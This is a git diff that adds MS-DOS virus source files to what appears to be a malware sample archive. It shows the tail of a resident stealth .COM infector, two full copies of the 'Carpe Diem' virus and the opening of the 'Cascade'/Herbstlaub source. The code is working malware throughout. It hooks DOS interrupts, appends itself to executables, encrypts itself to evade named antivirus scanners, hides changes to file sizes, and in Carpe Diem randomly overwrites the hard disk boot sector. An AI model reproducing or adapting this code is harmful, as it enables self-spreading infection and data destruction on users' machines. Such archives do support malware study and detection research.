Evil',0 + + +virus: pop bp + push bp + add bp,0FEFDh + + mov ax,0ABCDh ; put 0ABCDh into ax + int 21h ; for installation check + ; (also critical in directory stealth) + jnb failed ; if virus is already there, + ; will branch + cli ; to virus exit when in memory + mov ax,3521h + int 21h ; get interrupt vector + mov w [bp+offset oldint21],bx ; es:bx points to + mov w [bp+offset oldint21+2],es ; interrupt handler + + mov al,1Ch + int 21h + + + mov si,ds + std + lodsb + cld + mov ds,si + + xor bx,bx + mov cx,pargrph ; virus size in paragraphs to allot-->cx + mov ax,[bx+3] ; an off hand way of doing things + sub ax,cx ; + + mov [bx+3],ax + sub [bx+12h],cx + mov es,[bx+12h] + + push cs + pop ds + + mov di,100h + mov si,bp + add si,di + mov cx,size + rep movsb ; start copying virus into memory + + push es + pop ds + mov ax,2521h + mov dx,offset newint21 ; set int 21 route through virus + int 21h + +failed: push cs + push cs + pop ds + pop es + + pop si + mov di,100h + push di + jmp $ + 2 + movsw + movsw + jmp $ + 2 + movsb + + mov cx,0FFh + mov si,100h + ret ; exit to host + +newint21: pushf + cmp ah,11h ; any "dir" user access of file control + je stealth_entry ; block must come through virus + cmp ah,12h ; next file directory handler + je stealth_entry + + cmp ax,0ABCDh ; we need this so that when the virus + jne not_virus_input ; is controlling things, on + popf ; file infect it doesn't go + clc ; and subtract another length + retf 2 ; increment from the directory + ; entries of infected files. + ; although an amusing effect, + ; reducing the filesize of all + ; infected files as reported + ; by DIR one virus length everytime + ; the virus infects ANY file is + ; counter-productive +not_virus_input: + cmp ax,4B00h ; is a program being loaded? + je check_infect ; try to infect + cmp ah,3Dh ; is a file being opened? + je start_open_infect ; if so, get address + jne not_4B00 ; exit if not + +stealth_entry: + + popf + call int21 ; look to virus "stealth" + pushf ; routine + call stealth_begin + +cycle_dirstealth: + popf ; remove word from the stack + iret ; and return from interrupt + ; to where we were before pulling +stealth_begin: ; stealth trick + push ax ; the following essentially massages the + push bx ; file control block on directory scans, + push dx ; subtracting the virus size from infected + push es ; files before the user sees it + ; stack setup saves everything + mov ah,2Fh ; get disk transfer address + call int21 ; + + add bx,8 + +normalize_direntry: + + mov al,byte es:[bx+16h] ; retrieve seconds data + and al,1fh ; from observed file, if it's + xor al,1fh ; 31, the file is infected + jnz no_edit_entry ; not 31 - file not infected + mov ax,word es:[bx+1Ch] + mov dx,word es:[bx+1Ch+2] + sub ax,size ; subtract virus length from + sbb dx,0 ; infected file + jc no_edit_entry ; no files? exit + mov word es:[bx+1Ch],ax + mov word es:[bx+1Ch+2],dx +no_edit_entry: ; restore everything as normal + pop es ; + pop dx + pop bx + pop ax + ret + +start_open_infect: + + mov word ptr cs:[fileseg],dx + mov word ptr cs:[fileseg+2h],ds ; save segment:offset of + ; file being opened so it + ; can be infected, too +check_infect: push ax ; push everything onto stack + push bx + push cx + push dx + push ds + push bp + + mov ax,4300h ; get file attributes of potential host + call int21 + jc back1 ; failed? exit + mov cs:old_attr,cx ; put attributes here + + + mov ax,4301h ; set new file attributes, read or write + xor cx,cx + call int21 ; do it + jc back1 ; error? exit + + push dx + push ds + call infect ; call infection subroutine + pop ds + pop dx + + mov ax,4301h ; same as above + db 0B9h ; hand code mov CX, +old_attr dw 0 + call int21 + +back1: ; if the attrib-get fails + pop bp ; pop everything off stack + pop ds + pop dx + pop cx + pop bx + pop ax + + +not_4B00: + +back: popf + db 0EAh ; <--------- return to virus exit to host + +oldint21 dw 0,0 + +int21: pushf + call dword ptr cs:oldint21 ; <--interrupt handler + ret + +infect: mov ax,3D02h ; open host file with read/write access + call int21 + jnc okay_open + ret ; was there an error? exit + +okay_open: xchg bx,ax + mov ax,5700h ; get file date and file time + call int21 + + push cx + mov bp,sp + push dx + + mov al,cl ; retrieve seconds data from file one + or cl,1fh ; more time + xor al,cl ; if it's 31 (1fh), we get a zero + jz close ; and the file is already infected + + mov ah,3Fh ; read first five bytes from potential host + mov cx,5 + mov dx,offset host ; store them here + push cs + pop ds + call int21 + jc close ; error, exit? + cmp al,5 ; get the five bytes? + jne close ; no, so exit + + cmp word host[0],'ZM' ; check, is this an .EXE file? + je close ; yes, so no infection + cmp host[0],0E9h ; does it start with a jump? + je infect_host ; yes - infect. Here's a + ; subtle point. MUST look for 0e9h + ; or file is not .EXE, not marked + ; virus time-stamp, infection will +close: ; result in the virus adding itself + ; to almost anything loaded or + pop dx ; opened which is not an .EXE or + pop cx ; .OVL. The result would be a hang. + mov ax,5701h ; reset file date and time + call int21 + mov ah,3Eh ; close file + call int21 + ret ; exit + +infect_host: mov ax,4202h ; reset pointer to end of file + xor cx,cx ; a standard appending infection + xor dx,dx ; routine which is suitable + call int21 ; for most resident .COM infecting + ; viruses + or dx,dx + jnz close + + + dec ax + dec ax + dec ax + + mov word ptr putjmp[1],ax + + mov ah,40h ; write virus to the target file + mov cx,size ; length in cx + mov dx,100h + call int21 + jc close + + mov ax,4200h ; set file pointer to beginning of host + xor cx,cx + xor dx,dx + call int21 + + mov ah,40h ; write the first five bytes of the + mov cx,5 ; viral jump and vanity string to the + mov dx,offset putjmp ; beginning of the host file + call int21 + + or byte ss:[bp],31 ; set the seconds field to 31, so the + ; "stealth" routine has its cue + jmp close ; close the file and clean up + + + + +putjmp db 0E9h ; <----- data, jump and vanity sig for + dw 0 ; virus to copy to beginning of host + db 'UK' + + + +fileseg dd ? ; <--- buffer for seg:off of files + ; opened by user activated programs + + +mark: ; <-----end of virus + +size equ $-100h ; +pargrph equ ($+16)/16 ; virus size in memory in 16-byte + ; paragraphs + + + code ends + end begin + + diff --git a/MSDOS/Virus.MSDOS.Unknown.carpdiem.asm b/MSDOS/Virus.MSDOS.Unknown.carpdiem.asm new file mode 100644 index 00000000..85146938 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.carpdiem.asm @@ -0,0 +1,292 @@ +; VirusName : CARPE DIEM! - Seize the day +; Origin : Sweden +; Author : Raver +; Date : 16/11/93 + +; Well this is my (Raver's) first scratch virus. +; This virus is mainly made for educational purpose (my own!). +; It's pretty well commented in an easy way so even you folks +; with little experience with assembler should be able to follow +; the code! + +; It's a pretty simple non-overwriting .com-infector with a harmless +; nuking routine. It clears and restores the file attributes and +; date/time stamp and finds and infects files using the dot-dot method. +; An encryption routine and some "unusual" instructions are included to +; avoid detection by the common virus scanners. At release date, see +; above, neither F-prot nor Tb-scan found traces of virus code! + +; There is about a 5 percent chance that the nuking routine will be +; activated, it checks the system time for 1/100 of a second. If it's +; activated it'll overwrite the first sector on the fixed disk (c:) +; which contains the boot sector. This might seem cruel but, infact, +; it's quite harmless 'cause norton utilities and other programs +; easily restore the boot sector. It's there just to make inexperienced +; users (lamers!) nervous! + +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; CARPE DIEM! - Seize the day +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- + +cseg segment byte public 'code' + assume cs:cseg, ds:cseg + + org 100h + +start_of_virus: ;entry point + call get_off ;this somewhat unusual code won't +get_off: ;produce a flexible entry point flag + mov si,sp ;get the delta offset + mov bp,word ptr ss:[si] ;offset is on top of stack + sub bp,offset get_off ;put it in bp + inc sp ;restore sp to it's original + inc sp + +; call encrypt_decrypt ;decrypt the contents of the program + mov ax,bp ;use alternative code - otherwise + add ax,116h ;f-prot will recognize it as Radyum!!!! + push ax + jmp encrypt_decrypt + jmp encrypted_code_start ;jmp to the (en/de)crypted virus area + + +encryption_value dw 0 ;random value for encryption routine + + +write_virus_to_file: ;proc to append virus code to file + + call encrypt_decrypt ;encrypt the virus before write + + mov cx,offset end_of_virus-100h ;length of virus to be written + lea dx,[bp] ;write from start + mov ax,word ptr [bp+end_of_virus+1ah+2] ;most significant part of + inc ah ;file length in DTA. Is + add dx,ax ;always 0 in .com-files. + mov ah,40h ;Use this trick to fool + int 21h ;heuristic searches. + ;dx = delta offset+100h + call encrypt_decrypt ;decrypt the code for + ret ;further processing. + + +encrypt_decrypt: ;proc to (en/de)crypt the code + mov dx,word ptr [bp+encryption_value] ;use random number for every + lea si,[bp+encrypted_code_start] ;new infection + mov cx,(end_of_virus-encrypted_code_start+1)/2 + +crypt_loop: ;xor the whole virus code + xor word ptr [si],dx ;between encrypted_code_start + add si,2 ;and end_of_virus + loop crypt_loop + + ret + +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; Here the part that will be encrypted starts, i.e. all code +; except the encryption routine and the routine to append virus +; to file. +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- + +encrypted_code_start: + + cld + + mov ah,1ah ;Set DTA Transfer area to after + lea dx,[bp+end_of_virus] ;after the end of file to save file + int 21h ;size. Note: do not use default 80h + ;as DTA area since the parameters to + ;the "real" program will be overwritten! + + lea si,[bp+orgbuf] ;Transfer buffer contents + lea di,[bp+orgbuf2] ;to be restored to the beginning + mov cx,2 ;for restart of the "real" program + rep movsw + + mov di,2 ;Infection counter, 2 files every run + + mov ah,19h ;get current drive + int 21h + cmp al,2 ;check if a: or b: + jae get_cur_dir ;if so, skip infection. Otherwise + jmp no_more_files ;the user will most likely get + ;quite suspicious +get_cur_dir: + mov ah,47h ;get starting directory + xor dl,dl ;it will be changed by the + lea si,[bp+end_of_virus+2ch] ;dot-dot method later on + int 21h + +find_first: ;start finding the first .com file + mov cx,7 ;in every new dir + lea dx,[bp+filespec] + mov ah,4eh + int 21h + jnc clear_attribs ;successive? + + call ch_dir ;no more files in dir. change dir + jmp find_first ;start over again + ;otherwise jmp + +find_next: ;this is the upper point of the find + mov ah,4fh ;files loop in a dir + int 21h + jnc clear_attribs + + call ch_dir ;no more files in dir. change dir + jmp find_first ;start over again + +clear_attribs: ;set the file attribute to 0 + mov ax,4301h + xor cx,cx + lea dx,[bp+end_of_virus+1eh] + int 21h + +open_file: ;open file to be infected + mov ax,3d02h +; lea dx,[bp+end_of_virus+1eh] ;since clear_attribs + int 21h + + xchg ax,bx ;Put file handle in bx + +read_file: ;read first four bytes of file + mov ah,3fh ;They will be restore to the start + mov cx,4 ;after the virus is finnished + lea dx,[bp+orgbuf] ;so the program can execute + int 21h + +check_already_infected: ;check the first to bytes and check + mov si,dx ;if the file is already infected + lea si,[bp+orgbuf] + cmp word ptr [si],0e990h + je already_infected ;if so, jmp + + cmp word ptr [bp+end_of_virus+35],'DN' ;check if command.com + jz already_infected ;if so, don't infect + + mov ax,word ptr [bp+end_of_virus+1ah] ;check file size + cmp ax,500 ;and skip short and + jb already_infected ;long files + cmp ax,64000 + ja already_infected + + + mov ax,4202h ;get lenght of initial jmp in ax + xor cx,cx + xor dx,dx + int 21h + + sub ax,4 ;subtract the first four bytes, which + ;will be overwritten + + mov word ptr [bp+startbuf],0e990h ;load the buffer with a nop + mov word ptr [bp+startbuf+2],ax ;and a jmp to virus beginning + ;notice the reversed order! + + mov ax,4200h ;move to beginning of file + int 21h + + mov ah,40h ;write the new instructions + mov cx,4 + lea dx,[bp+startbuf] + int 21h + + mov ax,4202h ;move to end of file + xor cx,cx + xor dx,dx + int 21h + + mov ah,2ch ;get a random number from + int 21h ;system clock for the + mov word ptr [bp+encryption_value],dx ;encryption routine + call write_virus_to_file ;append the virus code + jmp restore_time_date + +already_infected: ;if already encrypted increase + inc di ;infection counter with one + +restore_time_date: ;restore file time & date + lea si,[bp+end_of_virus+16h] + mov cx,word ptr [si] + mov dx,word ptr [si+2] + mov ax,5701h + int 21h + +close_file: ;close the file handle + mov ah,3eh + int 21h + +set_old_attrib: ;restore the old file attrib + mov ax,4301h + xor ch,ch + mov cl,byte ptr [bp+end_of_virus+15h] + lea dx,[bp+end_of_virus+1eh] + int 21h + + dec di ;decrease infection counter + cmp di,0 ;and check if infection is + jbe no_more_files ;completed + jmp find_next + +no_more_files: + + mov ah,2ch ;get a new random number + int 21h ;5% chance of nuke + cmp dl,5 + ja restore_start ;above 5 no nuke + + mov ax,0301h ;trash the bootsector of c: + mov cx,0001h ;This might seem cruel but + mov dx,0080h ;norton and other programs + lea bx,[bp+start_of_virus] ;easily fix it. It's just + int 13h ;to make the user nervous!! + + mov ah,09h ;deliver a message too + lea dx,[bp+signature] + int 21h + + +restore_start: ;copy the four saved bytes to + lea si,[bp+orgbuf2] ;beginning of file in memory + mov di,100h + movsw + movsw + + +restore_dir: ;change back to original + lea dx,[bp+end_of_virus+2ch] ;dir + mov ah,3bh + int 21h + +exit_proc: ;return to start of program + mov bx,100h ;This will be enrypted in + push bx ;infected files, so anti-vir + ;progs won't complain. + xor ax,ax ;for org virus to push on + retn ;the stack for ret + + +ch_dir: + lea dx,[bp+dot_dot] ;use dot-dot method + mov ah,3bh + int 21h + jnc no_err ;sub dir existed + pop ax ;otherwise all files are checked. exit! + jmp no_more_files ;pop the ip pointer from the stack +no_err: ;and jump to the end part + ret + +signature db "CARPE DIEM! (c) '93 - Raver/Immortal Riot",0ah,0dh,'$' +country db " Sweden 16/11/93" +filespec db '*.com',0 +dot_dot db '..',0 +orgbuf db 90h,90h,50h,0c3h ;instructions to exit the +orgbuf2 db 4 dup(0) ;scratch after infection +startbuf db 4 dup(0) ;nop,nop,push ax,ret +end_of_virus: +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; The virus code ends here but the point below here (the heap) +; is used to store temporary variables such as the dta-area and +; the starting directory +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +cseg ends + end start_of_virus \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.carpe.asm b/MSDOS/Virus.MSDOS.Unknown.carpe.asm new file mode 100644 index 00000000..b59dd216 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.carpe.asm @@ -0,0 +1,293 @@ +; Well this is my (Raver's) first scratch virus. +; This virus is mainly made for educational purpose (my own!). +; It's pretty well commented in an easy way so even you folks +; with little experience with assembler should be able to follow +; the code! + +; It's a pretty simple non-overwriting .com-infector with a harmless +; nuking routine. It clears and restores the file attributes and +; date/time stamp and finds and infects files using the dot-dot method. +; An encryption routine and some "unusual" instructions are included to +; avoid detection by the common virus scanners. At release date, see +; above, neither F-prot nor Tb-scan found traces of virus code! + +; There is about a 5 percent chance that the nuking routine will be +; activated, it checks the system time for 1/100 of a second. If it's +; activated it'll overwrite the first sector on the fixed disk (c:) +; which contains the boot sector. This might seem cruel but, infact, +; it's quite harmless 'cause norton utilities and other programs +; easily restore the boot sector. It's there just to make inexperienced +; users (lamers!) nervous! + +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; CARPE DIEM! - Seize the day +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- + +cseg segment byte public 'code' + assume cs:cseg, ds:cseg + + org 100h + +start_of_virus: ;entry point + call get_off ;this somewhat unusual code won't +get_off: ;produce a flexible entry point flag + mov si,sp ;get the delta offset + mov bp,word ptr ss:[si] ;offset is on top of stack + sub bp,offset get_off ;put it in bp + inc sp ;restore sp to it's original + inc sp + +; call encrypt_decrypt ;decrypt the contents of the program + mov ax,bp ;use alternative code - otherwise + add ax,116h ;f-prot will recognize it as Radyum!!!! + push ax + jmp encrypt_decrypt + jmp encrypted_code_start ;jmp to the (en/de)crypted virus area + + +encryption_value dw 0 ;random value for encryption routine + + +write_virus_to_file: ;proc to append virus code to file + + call encrypt_decrypt ;encrypt the virus before write + + mov cx,offset end_of_virus-100h ;length of virus to be written + lea dx,[bp] ;write from start + mov ax,word ptr [bp+end_of_virus+1ah+2] ;most significant part of + inc ah ;file length in DTA. Is + add dx,ax ;always 0 in .com-files. + mov ah,40h ;Use this trick to fool + int 21h ;heuristic searches. + ;dx = delta offset+100h + call encrypt_decrypt ;decrypt the code for + ret ;further processing. + + +encrypt_decrypt: ;proc to (en/de)crypt the code + mov dx,word ptr [bp+encryption_value] ;use random number for every + lea si,[bp+encrypted_code_start] ;new infection + mov cx,(end_of_virus-encrypted_code_start+1)/2 + +crypt_loop: ;xor the whole virus code + xor word ptr [si],dx ;between encrypted_code_start + add si,2 ;and end_of_virus + loop crypt_loop + + ret + +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; Here the part that will be encrypted starts, i.e. all code +; except the encryption routine and the routine to append virus +; to file. +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- + +encrypted_code_start: + + cld + + mov ah,1ah ;Set DTA Transfer area to after + lea dx,[bp+end_of_virus] ;after the end of file to save file + int 21h ;size. Note: do not use default 80h + ;as DTA area since the parameters to + ;the "real" program will be overwritten! + + lea si,[bp+orgbuf] ;Transfer buffer contents + lea di,[bp+orgbuf2] ;to be restored to the beginning + mov cx,2 ;for restart of the "real" program + rep movsw + + mov di,2 ;Infection counter, 2 files every run + + mov ah,19h ;get current drive + int 21h + cmp al,2 ;check if a: or b: + jae get_cur_dir ;if so, skip infection. Otherwise + jmp no_more_files ;the user will most likely get + ;quite suspicious +get_cur_dir: + mov ah,47h ;get starting directory + xor dl,dl ;it will be changed by the + lea si,[bp+end_of_virus+2ch] ;dot-dot method later on + int 21h + +find_first: ;start finding the first .com file + mov cx,7 ;in every new dir + lea dx,[bp+filespec] + mov ah,4eh + int 21h + jnc clear_attribs ;successive? + + call ch_dir ;no more files in dir. change dir + jmp find_first ;start over again + ;otherwise jmp + +find_next: ;this is the upper point of the find + mov ah,4fh ;files loop in a dir + int 21h + jnc clear_attribs + + call ch_dir ;no more files in dir. change dir + jmp find_first ;start over again + +clear_attribs: ;set the file attribute to 0 + mov ax,4301h + xor cx,cx + lea dx,[bp+end_of_virus+1eh] + int 21h + +open_file: ;open file to be infected + mov ax,3d02h +; lea dx,[bp+end_of_virus+1eh] ;since clear_attribs + int 21h + + xchg ax,bx ;Put file handle in bx + +read_file: ;read first four bytes of file + mov ah,3fh ;They will be restore to the start + mov cx,4 ;after the virus is finnished + lea dx,[bp+orgbuf] ;so the program can execute + int 21h + +check_already_infected: ;check the first to bytes and check + mov si,dx ;if the file is already infected + lea si,[bp+orgbuf] + cmp word ptr [si],0e990h + je already_infected ;if so, jmp + + cmp word ptr [bp+end_of_virus+35],'DN' ;check if command.com + jz already_infected ;if so, don't infect + + mov ax,word ptr [bp+end_of_virus+1ah] ;check file size + cmp ax,500 ;and skip short and + jb already_infected ;long files + cmp ax,64000 + ja already_infected + + + mov ax,4202h ;get lenght of initial jmp in ax + xor cx,cx + xor dx,dx + int 21h + + sub ax,4 ;subtract the first four bytes, which + ;will be overwritten + + mov word ptr [bp+startbuf],0e990h ;load the buffer with a nop + mov word ptr [bp+startbuf+2],ax ;and a jmp to virus beginning + ;notice the reversed order! + + mov ax,4200h ;move to beginning of file + int 21h + + mov ah,40h ;write the new instructions + mov cx,4 + lea dx,[bp+startbuf] + int 21h + + mov ax,4202h ;move to end of file + xor cx,cx + xor dx,dx + int 21h + + mov ah,2ch ;get a random number from + int 21h ;system clock for the + mov word ptr [bp+encryption_value],dx ;encryption routine + call write_virus_to_file ;append the virus code + jmp restore_time_date + +already_infected: ;if already encrypted increase + inc di ;infection counter with one + +restore_time_date: ;restore file time & date + lea si,[bp+end_of_virus+16h] + mov cx,word ptr [si] + mov dx,word ptr [si+2] + mov ax,5701h + int 21h + +close_file: ;close the file handle + mov ah,3eh + int 21h + +set_old_attrib: ;restore the old file attrib + mov ax,4301h + xor ch,ch + mov cl,byte ptr [bp+end_of_virus+15h] + lea dx,[bp+end_of_virus+1eh] + int 21h + + dec di ;decrease infection counter + cmp di,0 ;and check if infection is + jbe no_more_files ;completed + jmp find_next + +no_more_files: + + mov ah,2ch ;get a new random number + int 21h ;5% chance of nuke + cmp dl,5 + ja restore_start ;above 5 no nuke + + mov ax,0301h ;trash the bootsector of c: + mov cx,0001h ;This might seem cruel but + mov dx,0080h ;norton and other programs + lea bx,[bp+start_of_virus] ;easily fix it. It's just + int 13h ;to make the user nervous!! + + mov ah,09h ;deliver a message too + lea dx,[bp+signature] + int 21h + + +restore_start: ;copy the four saved bytes to + lea si,[bp+orgbuf2] ;beginning of file in memory + mov di,100h + movsw + movsw + + +restore_dir: ;change back to original + lea dx,[bp+end_of_virus+2ch] ;dir + mov ah,3bh + int 21h + +exit_proc: ;return to start of program + mov bx,100h ;This will be enrypted in + push bx ;infected files, so anti-vir + ;progs won't complain. + xor ax,ax ;for org virus to push on + retn ;the stack for ret + + +ch_dir: + lea dx,[bp+dot_dot] ;use dot-dot method + mov ah,3bh + int 21h + jnc no_err ;sub dir existed + pop ax ;otherwise all files are checked. exit! + jmp no_more_files ;pop the ip pointer from the stack +no_err: ;and jump to the end part + ret + +signature db "CARPE DIEM! (c) '93 - Raver/Immortal Riot",0ah,0dh,'$' +country db " Sweden 16/11/93" +filespec db '*.com',0 +dot_dot db '..',0 +orgbuf db 90h,90h,50h,0c3h ;instructions to exit the +orgbuf2 db 4 dup(0) ;scratch after infection +startbuf db 4 dup(0) ;nop,nop,push ax,ret +end_of_virus: +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +; The virus code ends here but the point below here (the heap) +; is used to store temporary variables such as the dta-area and +; the starting directory +; 哪-哪哪哪-哪哪哪哪哪--哪哪哪哪哪哪--哪哪哪---哪哪哪哪哪哪-哪哪- +cseg ends + end start_of_virus + +... Sorry, the Dog ate my Blue Wave packet. +___ Blue Wave/QWK v2.12 + +--- Oblivion/2 2.10 + diff --git a/MSDOS/Virus.MSDOS.Unknown.cascade.asm b/MSDOS/Virus.MSDOS.Unknown.cascade.asm new file mode 100644 index 00000000..50095b0e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cascade.asm @@ -0,0 +1,1188 @@ +PAGE 62,132 +TITLE _HLV_ +SUBTTL Layout (C) 1990 164A12565AA18213165556D3125C4B962712 +.RADIX 16 +.LALL + +TRUE EQU 1 +FALSE EQU 0 + +MONTH EQU 9D +YEAR EQU 1991D + +DEMO EQU TRUE + +SWITCHABLE = TRUE +IFDEF _NOSWITCH +SWITCHABLE = FALSE +ENDIF + +comment # +赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + + ===================== + H E R B S T L A U B + ===================== + + + SPRACHE: MASM 4.00 (+) [ fr乭ere Versionen brechen z.B. mit + (not v6.00 ! ) *OUT OF MEMORY* (3.00) ab oder lassen + sogar den PC abst乺zen (1.10) ] + + ( Eine als Beispiel gedachte Batchdatei zur Steuerung der 歜ersetzung + ist am Ende dieses Quelltextes als Kommentar hinzugef乬t. ) + +韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + W刪rend der 歜ersetzung zu auszugebende Meldungen, 1. Teil. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 +# +IF1 +REPT 50 +%Out +ENDM; +%Out 赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍谀哪哪哪哪哪哪哪哪哪哪哪堪鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊澳哪哪哪哪哪哪哪哪 H E R B S T L A U B 媚哪哪哪哪哪哪哪哪陌昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍滥哪哪哪哪哪哪哪哪哪哪哪侔鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +ENDIF +comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einige Assembler - Makros. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 +# ; +MSDOS MACRO ; + INT 21 ; + ENDM ; +Wait_HRI_or_VRI MACRO ; + LOCAL _X_1, _X_2, _X_3 ; + MOV DX,03DA ; + CLI ; + _X_1: IN AL,DX ; + TEST AL,08 ; + JNZ _X_3 ; + TEST AL,01 ; + JNZ _X_1 ; + _X_2: IN AL,DX ; + TEST AL,01 ; + JZ _X_2 ; + _X_3 LABEL NEAR ; + ENDM ;------; +SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; + IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; + IFNB <_X> ;------; + IFIDN <_X>, ; + PUSHF ; + ELSE ; + PUSH _X ; + ENDIF ; + ENDIF ; + ENDM ; + ENDM ;------; +REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; + IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; + IFNB <_X> ;------; + IFIDN <_X>, ; + POPF ; + ELSE ; + POP _X ; + ENDIF ; + ENDIF ; + ENDM ; + ENDM ; +MOV_S MACRO S1,S2 ; + PUSH S2 ; + POP S1 ; + ENDM ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Start des Code-Segments, Segment Prefix Bytes werden n i c h t au- + tomatisch durch den Assembler erzeugt. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +TEXT SEGMENT ; + ASSUME CS:TEXT,DS:TEXT,ES:TEXT,SS:TEXT ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einige das Verst刵dnis erleichternde Definitionen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +NearJmp EQU 0E9 ; +PORT_B_8259A EQU 20 ; +EOI_8259A EQU 20 ; +PORT_B_8255 EQU 61 ; +FIRSTCONST EQU 0131 ; +FIRSTBASE EQU FIRSTCONST - OFFSET XI_001 ;-----; +FIRSTBASE2 EQU (FIRSTCONST + OFFSET XI_005 - XI_001) ; +DeCrptd EQU 0 ;-----; +EnCrptd EQU 1 ; +BIOSDATASEG EQU 040 ; +MonoBase EQU 0B000 ; +ColorBase EQU 0B800 ; +B_VIDPAGE EQU THIS WORD + 04E ; +B_TIMERVAR EQU THIS WORD + 06C ; +TimerInt EQU 1C ; +DOS EQU 21 ; +DOS_multi EQU 2F ; +MS_SetDTA EQU 1A ; + DTA_in_PSP EQU 80 ; +MS_SetInt EQU 25 ; +MS_GetDateTime EQU 2A ; +MS_GetVer EQU 30 ; + DOS_v_02 EQU 2 ; +MS_GetInt EQU 35 ; +MS_Open EQU 3Dh ; + Read_Only EQU 0 ; + Read_Write EQU 2 ; +MS_Close EQU 3E ; +MS_Read EQU 3F ; +MS_Write EQU 40 ; +MS_MoveFP EQU 42 ; + OfsFrmTop EQU 0 ; + OfsFrmEnd EQU 02 ; +MS_GetFileAttr EQU 4300 ; +MS_SetFileAttr EQU 4301 ; + Attr_A EQU 20 ; + Attr_SHR EQU 7 ; + Attr_ASHR EQU Attr_A OR Attr_SHR ; +MS_AllocMem EQU 48 ; +MS_ReleaseMem EQU 49 ; + MemCBsig EQU THIS BYTE + 0 ; + MemCBowned EQU THIS WORD + 1 ; + MemCBsize EQU THIS WORD + 3 ; +MS_Exec EQU 4Bh ; + MS_Exec_SF0 EQU 0 ; + Virus_fun EQU 0ffh ; + Virus_Sig EQU 55AA ; +MS_SetPSP EQU 50 ; + PSPsize EQU 00100 ; + PSPCurCom EQU THIS WORD + 016 ; + PSPEnv EQU THIS WORD + 02C ; + PSP_SegJFB EQU THIS WORD + 036 ; + NoEnv EQU 0 ; +MS_GetFileDate EQU 5700 ; +MS_SetFileDate EQU 5701 ; +PSP_100 EQU THIS WORD + PSPsize ; +PSP_102 EQU THIS BYTE + PSPsize + 2 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Ab hier wird Objektcode erzeugt, Datenbereich Nr. 1. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Crypt1 DB 0 ; +Crypt2 EQU OFFSET Crypt1 + FIRSTBASE ; 